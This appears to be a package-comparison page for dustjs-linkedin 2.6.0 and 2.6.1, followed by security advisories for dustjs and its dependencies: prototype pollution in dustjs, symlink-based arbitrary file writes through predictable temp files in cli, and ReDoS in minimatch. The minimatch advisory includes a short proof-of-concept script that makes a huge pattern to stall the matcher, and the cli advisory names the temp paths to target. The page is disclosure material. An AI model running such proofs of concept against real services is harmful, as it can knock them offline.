Dustjs-linkedin is a powerful asynchronous templating engine designed for both browser and Node.js environments, a fork maintained by LinkedIn. Versions 2.6.0 and 2.6.1 share the same core functionality, offering developers a versatile tool for creating dynamic user interfaces and server-side rendered content. Both rely on "cli" as a runtime dependency, version ~0.6.5.
The key changes between version 2.6.0 and 2.6.1 appears minimal, with no changes beyond bumping the version number and bumping a week in the release date. Both versions boast an extensive suite of development dependencies, highlighting a focus on thorough testing and continuous integration. These include tools like Grunt for task automation, PEG.js for parser generation, and various Grunt plugins for linting (jshint), minification (uglify), concatenation (concat), testing (jasmine, jasmine-node), and more. The presence of tools like grunt-gh-pages suggests that the project is actively maintained with continuous deployment practices.
For developers choosing between these two versions, the decision should be based on the most stable approach. If the 2.6.1 update addresses any critical but undocumented bug fixes or security vulnerabilities, upgrading is recommended. If stability is paramount, staying on 2.6.0 is acceptable. The project's MIT license ensures flexibility in usage.
All the vulnerabilities related to the version 2.6.1 of the package
dustjs-linkedin vulnerable to Prototype Pollution
A vulnerability was found in LinkedIn dustjs prior to version 3.0.0 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0 can address this issue. The name of the patch is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464.
Arbitrary File Write in cli
Affected versions of cli use predictable temporary file names. If an attacker can create a symbolic link at the location of one of these temporarly file names, the attacker can arbitrarily write to any file that the user which owns the cli process has permission to write to.
By creating Symbolic Links at the following locations, the target of the link can be written to.
lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';
Update to version 1.0.0 or later.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.